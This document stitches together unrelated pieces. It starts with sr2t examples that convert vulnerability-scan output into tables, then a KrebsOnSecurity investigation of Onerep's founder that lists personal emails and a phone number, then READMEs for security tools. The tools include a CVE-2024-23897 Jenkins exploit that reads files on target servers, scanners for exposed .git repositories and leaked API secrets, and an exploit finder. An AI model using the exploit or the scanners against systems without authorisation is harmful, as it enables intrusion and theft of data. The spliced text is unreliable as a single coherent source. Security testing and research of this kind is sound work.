| 192.168.142.2 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.2 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| 192.168.142.2 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.2 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.2 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.2 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.2 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.2 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.2 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
| 192.168.142.2 | 445 | 57608 | SMB Signing not required | 2 | X |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
Or to output a CSV file:
$ sr2t --nessus example/nessus.nessus -oC example
$ cat example_nessus.csv
host,port,plugin id,plugin name,severity,annotations
192.168.142.4,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.4,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.4,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.4,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.4,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.4,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.4,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.2,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.2,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.2,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.2,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.2,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.2,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,445,57608,SMB Signing not required,2,X
To produce an XLSX format:
$ sr2t --nmap example/nmap.xml -oX example.xlsx
To produce a text tabular format to stdout:
$ sr2t --nmap example/nmap.xml --nmap-services
Nmap TCP:
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| 192.168.23.78 | X | | X | X | X | X | X | X | | |
| 192.168.27.243 | | | | X | X | | X | X | X | X |
| 192.168.99.164 | | | | X | X | | X | X | X | X |
| 192.168.228.211 | | X | | | | | | | | |
| 192.168.171.74 | | | | X | X | | X | X | X | X |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
Nmap Services:
+-----------------+------+-------+---------------+-------+
| ip address | port | proto | service | state |
+-----------------+------+-------+---------------+-------+
| 192.168.23.78 | 53 | tcp | domain | open |
| 192.168.23.78 | 88 | tcp | kerberos-sec | open |
| 192.168.23.78 | 135 | tcp | msrpc | open |
| 192.168.23.78 | 139 | tcp | netbios-ssn | open |
| 192.168.23.78 | 389 | tcp | ldap | open |
| 192.168.23.78 | 445 | tcp | microsoft-ds | open |
| 192.168.23.78 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 135 | tcp | msrpc | open |
| 192.168.27.243 | 139 | tcp | netbios-ssn | open |
| 192.168.27.243 | 445 | tcp | microsoft-ds | open |
| 192.168.27.243 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 5800 | tcp | vnc-http | open |
| 192.168.27.243 | 5900 | tcp | vnc | open |
| 192.168.99.164 | 135 | tcp | msrpc | open |
| 192.168.99.164 | 139 | tcp | netbios-ssn | open |
| 192.168.99.164 | 445 | tcp | microsoft-ds | open |
| 192.168.99.164 | 3389 | tcp | ms-wbt-server | open |
| 192.168.99.164 | 5800 | tcp | vnc-http | open |
| 192.168.99.164 | 5900 | tcp | vnc | open |
| 192.168.228.211 | 80 | tcp | http | open |
| 192.168.171.74 | 135 | tcp | msrpc | open |
| 192.168.171.74 | 139 | tcp | netbios-ssn | open |
| 192.168.171.74 | 445 | tcp | microsoft-ds | open |
| 192.168.171.74 | 3389 | tcp | ms-wbt-server | open |
| 192.168.171.74 | 5800 | tcp | vnc-http | open |
| 192.168.171.74 | 5900 | tcp | vnc | open |
+-----------------+------+-------+---------------+-------+
Or to output a CSV file:
$ sr2t --nmap example/nmap.xml -oC example
$ cat example_nmap_tcp.csv
ip address,53,80,88,135,139,389,445,3389,5800,5900
192.168.23.78,X,,X,X,X,X,X,X,,
192.168.27.243,,,,X,X,,X,X,X,X
192.168.99.164,,,,X,X,,X,X,X,X
192.168.228.211,,X,,,,,,,,
192.168.171.74,,,,X,X,,X,X,X,X
To produce an XLSX format:
$ sr2t --nikto example/nikto.xml -oX example/nikto.xlsx
To produce a text tabular format to stdout:
$ sr2t --nikto example/nikto.xml
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| target ip | target hostname | target port | description | annotations |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| 192.168.178.10 | 192.168.178.10 | 80 | The anti-clickjacking X-Frame-Options header is not present. | X |
| 192.168.178.10 | 192.168.178.10 | 80 | The X-XSS-Protection header is not defined. This header can hint to the user | X |
| | | | agent to protect against some forms of XSS | |
| 192.168.178.10 | 192.168.178.10 | 80 | The X-Content-Type-Options header is not set. This could allow the user agent to | X |
| | | | render the content of the site in a different fashion to the MIME type | |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
Or to output a CSV file:
$ sr2t --nikto example/nikto.xml -oC example
$ cat example_nikto.csv
target ip,target hostname,target port,description,annotations
192.168.178.10,192.168.178.10,80,The anti-clickjacking X-Frame-Options header is not present.,X
192.168.178.10,192.168.178.10,80,"The X-XSS-Protection header is not defined. This header can hint to the user
agent to protect against some forms of XSS",X
192.168.178.10,192.168.178.10,80,"The X-Content-Type-Options header is not set. This could allow the user agent to
render the content of the site in a different fashion to the MIME type",X
To produce an XLSX format:
$ sr2t --dirble example/dirble.xml -oX example.xlsx
To produce a text tabular format to stdout:
$ sr2t --dirble example/dirble.xml
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| url | code | content len | is directory | is listable | found from listable | redirect url | annotations |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| http://example.org/flv | 0 | 0 | false | false | false | | X |
| http://example.org/hire | 0 | 0 | false | false | false | | X |
| http://example.org/phpSQLiteAdmin | 0 | 0 | false | false | false | | X |
| http://example.org/print_order | 0 | 0 | false | false | false | | X |
| http://example.org/putty | 0 | 0 | false | false | false | | X |
| http://example.org/receipts | 0 | 0 | false | false | false | | X |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
Or to output a CSV file:
$ sr2t --dirble example/dirble.xml -oC example
$ cat example_dirble.csv
url,code,content len,is directory,is listable,found from listable,redirect url,annotations
http://example.org/flv,0,0,false,false,false,,X
http://example.org/hire,0,0,false,false,false,,X
http://example.org/phpSQLiteAdmin,0,0,false,false,false,,X
http://example.org/print_order,0,0,false,false,false,,X
http://example.org/putty,0,0,false,false,false,,X
http://example.org/receipts,0,0,false,false,false,,X
To produce an XLSX format:
$ sr2t --testssl example/testssl.json -oX example.xlsx
To produce a text tabular format to stdout:
$ sr2t --testssl example/testssl.json
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| ip address | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| rc4-md5.badssl.com/104.154.89.105 | 443 | X | X | X | X | X | X | X | X |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
Or to output a CSV file:
$ sr2t --testssl example/testssl.json -oC example
$ cat example_testssl.csv
ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard
rc4-md5.badssl.com/104.154.89.105,443,X,X,X,X,X,X,X,X
To produce an XLSX format:
$ sr2t --fortify example/fortify.fpr -oX example.xlsx
To produce a text tabular format to stdout:
$ sr2t --fortify example/fortify.fpr
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| | type | subtype | severity | confidence | annotations |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| example1/web.xml:135:135 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example2/web.xml:150:150 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example3/web.xml:109:109 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example4/web.xml:108:108 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example5/web.xml:166:166 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example6/web.xml:2:2 | J2EE Misconfiguration | Excessive Session Timeout | 3.0 | 5.0 | X |
| example7/web.xml:162:162 | J2EE Misconfiguration | Missing Authentication Method | 3.0 | 5.0 | X |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
Or to output a CSV file:
$ sr2t --fortify example/fortify.fpr -oC example
$ cat example_fortify.csv
,type,subtype,severity,confidence,annotations
example1/web.xml:135:135,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example2/web.xml:150:150,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example3/web.xml:109:109,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example4/web.xml:108:108,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example5/web.xml:166:166,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example6/web.xml:2:2,J2EE Misconfiguration,Excessive Session Timeout,3.0,5.0,X
example7/web.xml:162:162,J2EE Misconfiguration,Missing Authentication Method,3.0,5.0,X
The data privacy company Onerep.com bills itself as a Virginia-based service for helping people remove their personal information from almost 200 people-search websites. However, an investigation into the history of onerep.com finds this company is operating out of Belarus and Cyprus, and that its founder has launched dozens of people-search services over the years.
Onerep's "Protect" service starts at $8.33 per month for individuals and $15/mo for families, and promises to remove your personal information from nearly 200 people-search sites. Onerep also markets its service to companies seeking to offer their employees the ability to have their data continuously removed from people-search sites.
A testimonial on onerep.com.
Customer case studies published on onerep.com state that it struck a deal to offer the service to employees of Permanente Medicine, which represents the doctors within the health insurance giant Kaiser Permanente. Onerep also says it has made inroads among police departments in the United States.
But a review of Onerep's domain registration records and that of its founder reveal a different side to this company. Onerep.com says its founder and CEO is Dimitri Shelest from Minsk, Belarus, as does Shelest's profile on LinkedIn. Historic registration records indexed by DomainTools.com say Mr. Shelest was a registrant of onerep.com who used the email address dmitrcox2@gmail.com.
A search in the data breach tracking service Constella Intelligence for the name Dimitri Shelest brings up the email address dimitri.shelest@onerep.com. Constella also finds that Dimitri Shelest from Belarus used the email address d.sh@nuwber.com, and the Belarus phone number +375-292-702786.
Nuwber.com is a people search service whose employees all appear to be from Belarus, and it is one of dozens of people-search companies that Onerep claims to target with its data-removal service. Onerep.com's website disavows any relationship to Nuwber.com, stating quite clearly, "Please note that OneRep is not associated with Nuwber.com."
However, there is an abundance of evidence suggesting Mr. Shelest is in fact the founder of Nuwber. Constella found that Minsk telephone number (375-292-702786) has been used multiple times in connection with the email address dmitrcox@gmail.com. Recall that Onerep.com's domain registration records in 2018 list the email address dmitrcox2@gmail.com.
It appears Mr. Shelest sought to reinvent his online identity in 2015 by adding a "2" to his email address. The Belarus phone number tied to Nuwber.com shows up in the domain records for comversus.com, and DomainTools says this domain is tied to both dmitrcox@gmail.com and dmitrcox2@gmail.com. Other domains that mention both email addresses in their WHOIS records include careon.me, docvsdoc.com, dotcomsvdot.com, namevname.com, okanyway.com and tapanyapp.com.
Onerep.com CEO and founder Dimitri Shelest, as pictured on the "about" page of onerep.com.
A search in DomainTools for the email address dmitrcox@gmail.com shows it is associated with the registration of at least 179 domain names, including dozens of mostly now-defunct people-search companies targeting citizens of Argentina, Brazil, Canada, Denmark, France, Germany, Hong Kong, Israel, Italy, Japan, Latvia and Mexico, among others.
Those include nuwber.fr, a site registered in 2016 which was identical to the homepage of Nuwber.com at the time. DomainTools shows the same email and Belarus phone number are in historic registration records for nuwber.at, nuwber.ch, and nuwber.dk (all domains linked here are to their cached copies at archive.org, where available).
Update, March 21, 11:15 a.m. ET: Mr. Shelest has provided a lengthy response to the findings in this story. In summary, Shelest acknowledged maintaining an ownership stake in Nuwber, but said there was "zero cross-over or information-sharing with OneRep." Mr. Shelest said any other old domains that may be found and associated with his name are no longer being operated by him.
"I get it," Shelest wrote. "My affiliation with a people search business may look odd from the outside. In truth, if I hadn't taken that initial path with a deep dive into how people search sites work, Onerep wouldn't have the best tech and team in the space. Still, I now appreciate that we did not make this more clear in the past and I'm aiming to do better in the future." The full statement is available here (PDF).
Original story:
Historic WHOIS records for onerep.com show it was registered for many years to a resident of Sioux Falls, SD for a completely unrelated site. But around Sept. 2015 the domain switched from the registrar GoDaddy.com to eNom, and the registration records were hidden behind privacy protection services. DomainTools indicates around this time onerep.com started using domain name servers from DNS provider constellix.com. Likewise, Nuwber.com first appeared in late 2015, was also registered through eNom, and also started using constellix.com for DNS at nearly the same time.
Listed on LinkedIn as a former product manager at OneRep.com between 2015 and 2018 is Dimitri Bukuyazau, who says their hometown is Warsaw, Poland. While this LinkedIn profile (linkedin.com/in/dzmitrybukuyazau) does not mention Nuwber, a search on this name in Google turns up a 2017 blog post from privacyduck.com, which laid out a number of reasons to support a conclusion that OneRep and Nuwber.com were the same company.
"Any people search profiles containing your Personally Identifiable Information that were on Nuwber.com were also mirrored identically on OneRep.com, down to the relatives' names and address histories," Privacyduck.com wrote. The post continued:
"Both sites offered the same immediate opt-out process. Both sites had the same generic contact and support structure. They were – and remain – the same company (even PissedConsumer.com advocates this fact: https://nuwber.pissedconsumer.com/nuwber-and-onerep-20160707878520.html)."
"Things changed in early 2016 when OneRep.com began offering privacy removal services right alongside their own open displays of your personal information. At this point when you found yourself on Nuwber.com OR OneRep.com, you would be provided with the option of opting-out your data on their site for free – but also be highly encouraged to pay them to remove it from a slew of other sites (and part of that payment was removing you from their own site, Nuwber.com, as a benefit of their service)."
Reached via LinkedIn, Mr. Bukuyazau declined to answer questions, such as whether he ever worked at Nuwber.com. However, Constella Intelligence finds two interesting email addresses for employees at nuwber.com: d.bu@nuwber.com, and d.bu+figure-eight.com@nuwber.com, which was registered under the name "Dzmitry."
PrivacyDuckβs claims about how onerep.com appeared and behaved in the early days are not readily verifiable because the domain onerep.com has been completely excluded from the Wayback Machine at archive.org. The Wayback Machine will honor such requests if they come directly from the owner of the domain in question.
Still, Mr. Shelest's name, phone number and email also appear in the domain registration records for a truly dizzying number of country-specific people-search services, including pplcrwlr.in, pplcrwlr.fr, pplcrwlr.dk, pplcrwlr.jp, peeepl.br.com, peeepl.in, peeepl.it and peeepl.co.uk.
The same details appear in the WHOIS registration records for the now-defunct people-search sites waatpp.de, waatp1.fr, azersab.com, and ahavoila.com, a people-search service for French citizens.
A search on the email address dmitrcox@gmail.com suggests Mr. Shelest was previously involved in rather aggressive email marketing campaigns. In 2010, an anonymous source leaked to KrebsOnSecurity the financial and organizational records of Spamit, which at the time was easily the largest Russian-language pharmacy spam affiliate program in the world.
Spamit paid spammers a hefty commission every time someone bought male enhancement drugs from any of their spam-advertised websites. Mr. Shelest's email address stood out because immediately after the Spamit database was leaked, KrebsOnSecurity searched all of the Spamit affiliate email addresses to determine if any of them corresponded to social media accounts at Facebook.com (at the time, Facebook allowed users to search profiles by email address).
That mapping, which was done mainly by generous graduate students at my alma mater George Mason University, revealed that dmitrcox@gmail.com was used by a Spamit affiliate, albeit not a very profitable one. That same Facebook profile for Mr. Shelest is still active, and it says he is married and living in Minsk [Update, Mar. 16: Mr. Shelest's Facebook account is no longer active].
Scrolling down Mr. Shelest's Facebook page to posts made more than ten years ago show him liking the Facebook profile pages for a large number of other people-search sites, including findita.com, findmedo.com, folkscan.com, huntize.com, ifindy.com, jupery.com, look2man.com, lookerun.com, manyp.com, peepull.com, perserch.com, persuer.com, pervent.com, piplenter.com, piplfind.com, piplscan.com, popopke.com, pplsorce.com, qimeo.com, scoutu2.com, search64.com, searchay.com, seekmi.com, selfabc.com, socsee.com, srching.com, toolooks.com, upearch.com, webmeek.com, and many country-code variations of viadin.ca (e.g. viadin.hk, viadin.com and viadin.de).
Domaintools.com finds that all of the domains mentioned in the last paragraph were registered to the email address dmitrcox@gmail.com.
Mr. Shelest has not responded to multiple requests for comment. KrebsOnSecurity also sought comment from onerep.com, which likewise has not responded to inquiries about its founder's many apparent conflicts of interest. In any event, these practices would seem to contradict the goal Onerep has stated on its site: "We believe that no one should compromise personal online security and get a profit from it."
Max Anderson is chief growth officer at 360 Privacy, a legitimate privacy company that works to keep its clients' data off of more than 400 data broker and people-search sites. Anderson said it is concerning to see a direct link between a data removal service and data broker websites.
"I would consider it unethical to run a company that sells people's information, and then charge those same people to have their information removed," Anderson said.
Last week, KrebsOnSecurity published an analysis of the people-search data broker giant Radaris, whose consumer profiles are deep enough to rival those of far more guarded data broker resources available to U.S. police departments and other law enforcement personnel.
That story revealed that the co-founders of Radaris are two native Russian brothers who operate multiple Russian-language dating services and affiliate programs. It also appears many of the Radaris founders' businesses have ties to a California marketing firm that works with a Russian state-run media conglomerate currently sanctioned by the U.S. government.
KrebsOnSecurity will continue investigating the history of various consumer data brokers and people-search providers. If any readers have inside knowledge of this industry or key players within it, please consider reaching out to krebsonsecurity at gmail.com.
Update, March 15, 11:35 a.m. ET: Many readers have pointed out something that was somehow overlooked amid all this research: The Mozilla Foundation, the company that runs the Firefox Web browser, has launched a data removal service called Mozilla Monitor that bundles OneRep. That notice says Mozilla Monitor is offered as a free or paid subscription service.
"The free data breach notification service is a partnership with Have I Been Pwned ("HIBP")," the Mozilla Foundation explains. "The automated data deletion service is a partnership with OneRep to remove personal information published on publicly available online directories and other aggregators of information about individuals ("Data Broker Sites")."
In a statement shared with KrebsOnSecurity.com, Mozilla said they did assess OneRep's data removal service to confirm it acts according to privacy principles advocated at Mozilla.
"We were aware of the past affiliations with the entities named in the article and were assured they had ended prior to our work together," the statement reads. "We're now looking into this further. We will always put the privacy and security of our customers first and will provide updates as needed."
In the dynamic realm of cybersecurity, vigilance and proactive defense are key. Malicious actors often leverage Microsoft Office files and Zip archives, embedding covert URLs or macros to initiate harmful actions. This Python script is crafted to detect potential threats by scrutinizing the contents of Microsoft Office documents, Acrobat Reader PDF documents and Zip files, reducing the risk of inadvertently triggering malicious code.
The script smartly identifies Microsoft Office documents (.docx, .xlsx, .pptx), Acrobat Reader PDF documents (.pdf) and Zip files. These file types, including Office documents, are zip archives that can be examined programmatically.
For both Office and Zip files, the script decompresses the contents into a temporary directory. It then scans these contents for URLs using regular expressions, searching for potential signs of compromise.
To minimize false positives, the script includes a list of domains to ignore, filtering out common URLs typically found in Office documents. This ensures focused analysis on unusual or potentially harmful URLs.
Files with URLs not on the ignored list are marked as suspicious. This heuristic method allows for adaptability based on your specific security context and threat landscape.
Post-scanning, the script cleans up by erasing temporary decompressed files, leaving no traces.
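For illustration, here is a minimal Python sketch of the zip-based part of that workflow. The ignore list, regex, and function names here are illustrative assumptions, not the script's actual internals:

import os
import re
import shutil
import sys
import tempfile
import zipfile

# Illustrative ignore list: benign domains commonly embedded in Office files.
IGNORED_DOMAINS = ("schemas.openxmlformats.org", "schemas.microsoft.com",
                   "purl.org", "www.w3.org")

URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#@!$&'()*+,;=%-]+")

def scan_zip_based_file(path):
    """Decompress a zip-based document and return URLs not on the ignore list."""
    suspicious = []
    # Extract untrusted archives only into a throwaway temporary directory.
    tmpdir = tempfile.mkdtemp()
    try:
        with zipfile.ZipFile(path) as archive:
            archive.extractall(tmpdir)
        for root, _dirs, files in os.walk(tmpdir):
            for name in files:
                with open(os.path.join(root, name), "rb") as handle:
                    for url in URL_RE.findall(handle.read()):
                        if not any(d.encode() in url for d in IGNORED_DOMAINS):
                            suspicious.append(url.decode(errors="replace"))
    finally:
        shutil.rmtree(tmpdir)  # clean up: leave no traces behind
    return suspicious

if __name__ == "__main__":
    for url in scan_zip_based_file(sys.argv[1]):
        print(f"[!] Suspicious URL: {url}")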
To effectively utilize the script:
Execute the script with the command: python CanaryTokenScanner.py FILE_OR_DIRECTORY_PATH (replace FILE_OR_DIRECTORY_PATH with the actual file or directory path).
Interpretation
An example of the Canary Token Scanner script in action, demonstrating its capability to detect suspicious URLs.
This script is intended for educational and security testing purposes only. Utilize it responsibly and in compliance with applicable laws and regulations.
Exploitation and scanning tool specifically designed for Jenkins versions <= 2.441 and <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities in Jenkins instances.
Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.
python CVE-2024-23897.py -t <target> -p <port> -f <file>
or
python CVE-2024-23897.py -i <input_file> -f <file>
Parameters:
- -t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block.
- -i or --input-file: Path to input file containing hosts in the format of http://1.2.3.4:8080/ (one per line).
- -o or --output-file: Export results to file (optional).
- -p or --port: Specify the port number. Default is 8080 (optional).
- -f or --file: Specify the file to read on the target system.
Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.
Alexander Hagenah - URL - Twitter
This tool is meant for educational and professional purposes only. Unauthorized scanning and exploiting of systems is illegal and unethical. Always ensure you have explicit permission to test and exploit any systems you target.
RepoReaper is a precision tool designed to automate the identification of exposed .git repositories across a list of domains and subdomains. By processing a user-provided text file with domain names, RepoReaper systematically checks each for publicly accessible .git files. This enables rapid assessment and protection against information leaks, making RepoReaper an essential resource for security teams and web developers.
Clone the repository and install the required dependencies:
git clone https://github.com/YourUsername/RepoReaper.git
cd RepoReaper
pip install -r requirements.txt
chmod +x RepoReaper.py
RepoReaper is executed from the command line and will prompt for the path to a file containing a list of domains or subdomains to be scanned.
To start RepoReaper, simply run:
./RepoReaper.py
or
python3 RepoReaper.py
Upon execution, RepoReaper will ask for the path to the file containing the domains or subdomains:
Enter the path of the file containing domains
Provide the path to your text file when prompted. The file should contain one domain or subdomain per line, like so:
example.com
subdomain.example.com
anotherdomain.com
RepoReaper will then proceed to scan the provided domains or subdomains for exposed .git repositories and report its findings.
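The underlying check is simple enough to sketch. The following hypothetical Python snippet illustrates the idea (not RepoReaper's actual code): request /.git/HEAD for each domain and look for the telltale ref: prefix.

import sys
import requests

def git_exposed(domain):
    """Return True if the domain serves a readable .git/HEAD file."""
    for scheme in ("https", "http"):
        try:
            r = requests.get(f"{scheme}://{domain}/.git/HEAD",
                             timeout=5, allow_redirects=False)
        except requests.RequestException:
            continue
        # A real .git/HEAD starts with "ref:" (or holds a bare commit hash).
        if r.status_code == 200 and r.text.strip().startswith("ref:"):
            return True
    return False

if __name__ == "__main__":
    with open(sys.argv[1]) as handle:
        for domain in (line.strip() for line in handle if line.strip()):
            print(f"{domain}: {'EXPOSED' if git_exposed(domain) else 'ok'}")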
This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.
SploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability. It empowers cybersecurity professionals to swiftly identify and apply known and tested exploits. It's particularly valuable for professionals seeking to enhance their security measures or develop robust detection strategies against emerging threats.
Regular:
python sploitscan.py CVE-YYYY-NNNNN
Enter one or more CVE IDs to fetch data. Separate multiple CVE IDs with spaces.
python sploitscan.py CVE-YYYY-NNNNN CVE-YYYY-NNNNN
Optional: Export the results to a JSON or CSV file. Specify the format: 'json' or 'csv'.
python sploitscan.py CVE-YYYY-NNNNN -e JSON
The Patching Prioritization System in SploitScan provides a strategic approach to prioritizing security patches based on the severity and exploitability of vulnerabilities. It's influenced by the model from CVE Prioritizer, with enhancements for handling publicly available exploits. Here's how it works:
This system assists users in making informed decisions on which vulnerabilities to patch first, considering both their potential impact and the likelihood of exploitation. Thresholds can be changed to your business needs.
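As a rough illustration of such a scheme, here is a hedged Python sketch; the tier names and the CVSS/EPSS thresholds are assumptions for the example, not necessarily SploitScan's exact values:

def patch_priority(cvss, epss, public_exploit):
    """Rank a CVE for patching from CVSS severity, EPSS probability, and
    whether public exploit code exists (thresholds are illustrative)."""
    if public_exploit:
        return "A+"  # public exploit code available: patch first
    if cvss >= 6.0 and epss >= 0.2:
        return "A"   # severe and likely to be exploited
    if cvss >= 6.0:
        return "B"   # severe, but exploitation less likely
    if epss >= 0.2:
        return "C"   # lower severity, yet exploitation is likely
    return "D"       # lower severity and low exploitation probability

print(patch_priority(cvss=9.8, epss=0.92, public_exploit=True))  # -> A+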
Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.
Alexander Hagenah - URL - Twitter
SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals.
Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API.
SwaggerHub is a collaborative platform for designing, building, and managing APIs using the Swagger framework. It offers a centralized repository for API documentation, version control, and collaboration among team members. SwaggerHub simplifies the API development lifecycle by providing a unified platform for API design and testing.
Performing OSINT on SwaggerHub is crucial because developers, in their pursuit of efficient API documentation and sharing, may inadvertently expose sensitive information. Here are key reasons why OSINT on SwaggerHub is valuable:
Developer Oversights: Developers might unintentionally include secrets, credentials, or sensitive information in API documentation on SwaggerHub. These oversights can lead to security vulnerabilities and unauthorized access if not identified and addressed promptly.
Security Best Practices: OSINT on SwaggerHub helps enforce security best practices. Identifying and rectifying potential security issues early in the development lifecycle is essential to ensure the confidentiality and integrity of APIs.
Preventing Data Leaks: By systematically scanning SwaggerHub for sensitive information, organizations can proactively prevent data leaks. This is especially crucial in today's interconnected digital landscape where APIs play a vital role in data exchange between services.
Risk Mitigation: Understanding that developers might forget to remove or obfuscate sensitive details in API documentation underscores the importance of continuous OSINT on SwaggerHub. This proactive approach mitigates the risk of unintentional exposure of critical information.
Compliance and Privacy: Many industries have stringent compliance requirements regarding the protection of sensitive data. OSINT on SwaggerHub ensures that APIs adhere to these regulations, promoting a culture of compliance and safeguarding user privacy.
Educational Opportunities: Identifying oversights in SwaggerHub documentation provides educational opportunities for developers. It encourages a security-conscious mindset, fostering a culture of awareness and responsible information handling.
By recognizing that developers can inadvertently expose secrets, OSINT on SwaggerHub becomes an integral part of the overall security strategy, safeguarding against potential threats and promoting a secure API ecosystem.
SwaggerSpy obtains information from SwaggerHub and utilizes regular expressions to inspect API documentation for sensitive information, such as secrets and credentials.
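Conceptually, that boils down to pulling API definitions and pattern-matching them for secret-shaped strings. A minimal Python sketch of the idea follows; the SwaggerHub search endpoint, response fields, and regexes are assumptions for illustration, not SwaggerSpy's actual internals:

import re
import sys
import requests

# Secret-shaped patterns (illustrative, far from exhaustive).
PATTERNS = {
    "AWS access key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "Bearer token": re.compile(r"[Bb]earer\s+[A-Za-z0-9\-._~+/]{20,}"),
    "Password field": re.compile(r"(?i)password['\"]?\s*[:=]\s*['\"][^'\"]+"),
}

def scan_text(name, text):
    for label, pattern in PATTERNS.items():
        for match in pattern.findall(text):
            print(f"[{name}] {label}: {match}")

if __name__ == "__main__":
    # Assumed SwaggerHub registry search endpoint and response layout.
    resp = requests.get("https://api.swaggerhub.com/specs",
                        params={"query": sys.argv[1], "limit": 25}, timeout=10)
    for api in resp.json().get("apis", []):
        for prop in api.get("properties", []):
            if prop.get("type") == "Swagger":  # link to the raw API definition
                doc = requests.get(prop["url"], timeout=10)
                scan_text(api.get("name", "api"), doc.text)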
To use SwaggerSpy, follow these steps:
git clone https://github.com/UndeadSec/SwaggerSpy.git
cd SwaggerSpy
pip install -r requirements.txt
python swaggerspy.py searchterm
SwaggerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.
Contributions to SwaggerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.
SwaggerSpy is developed and maintained by Alisson Moretto (UndeadSec)
I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.
SwaggerSpy is licensed under the MIT License. See the LICENSE file for details.
